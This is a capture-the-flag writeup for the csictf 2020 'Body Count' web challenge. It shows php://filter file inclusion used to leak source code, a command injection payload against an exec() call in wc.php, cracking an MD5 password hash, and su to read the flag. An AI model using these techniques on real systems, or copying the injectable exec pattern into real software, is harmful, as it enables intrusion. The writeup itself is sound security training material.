csictf 2020

CTF Writeup - https://ctftime.org/event/1081

Home csictf 2020 Writeups Home
21 July 2020

Body Count

by anishbadhri

Here’s a character count service for you!

http://chall.csivit.com:30202

Solution

On observing, there’s a cookie called password with value as PASSWORD.

On going to robots.txt, the file checkpass.php is disallowed. To view this file, we can make use of php inbuilts. http://chall.csivit.com:30202/?file=php://filter/convert.base64-encode/resource=checkpass.php. This returns a base64 encoding of checkpass.php.

checkpass.php

<?php
$password = "w0rdc0unt123";
// Cookie password.
echo "IMPORTANT!!! The page is still under development. This has a secret, do not push this page.";

header('Location: /');

Thus, the password is w0rdc0unt123. Setting this as the cookie value sets a new webpage.

Finding how word count is executed and accessing shell

This first needs access to the contents of wc.php. http://chall.csivit.com:30202/?file=php://filter/convert.base64-encode/resource=wc.php.

wc.php

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>wc as a service</title>
    <style>
        html,
        body {
            overflow: none;
            max-height: 100vh;
        }
    </style>
</head>

<body style="height: 100vh; text-align: center; background-color: black; color: white; display: flex; flex-direction: column; justify-content: center;">
    <?php
    ini_set('max_execution_time', 5);
    if ($_COOKIE['password'] !== getenv('PASSWORD')) {
        setcookie('password', 'PASSWORD');
        die('Sorry, only people from csivit are allowed to access this page.');
    }
    ?>

    <h1>Character Count as a Service</h1>
    <form>
        <input type="hidden" value="wc.php" name="file">
        <textarea style="border-radius: 1rem;" type="text" name="text" rows=30 cols=100></textarea><br />
        <input type="submit">
    </form>
    <?php
    if (isset($_GET["text"])) {
        $text = $_GET["text"];
        echo "<h2>The Character Count is: " . exec('printf \'' . $text . '\' | wc -c') . "</h2>";
    }
    ?>
</body>

</html>

The command is executed as printf '{text}' | wc -c'. This can be exploited by passing the value of text as '; {command} # where command can be any linux shell command. This basically

Locating flag

This can be done with the find command

find / -iname "*flag*" 

This return the location of the flag as /ctf/system/of/a/down/flag.txt. However, trying to cat this file fails. The reason why can be seen on executing

ls -l /ctf/system/of/a/down/flag.txt

The file doesn’t allow any user other than root and ctf to view the file. Thus this needs the password of root or ctf.

On further searching of the entire file system, a file /ctf/README can be found. Viewing this file returns

My password hash is 6f246c872cbf0b7fd7530b7aa235e67e.

With a few reversing attempts, the original string resulting in this hash is csictf. Running the cat command as the user ctf returns the flag.

echo "csictf" | su ctf -c "cat /ctf/system/of/a/down/flag.txt" 

Flag

csictf{1nj3ct10n_15_p41nfu1}
tags: Web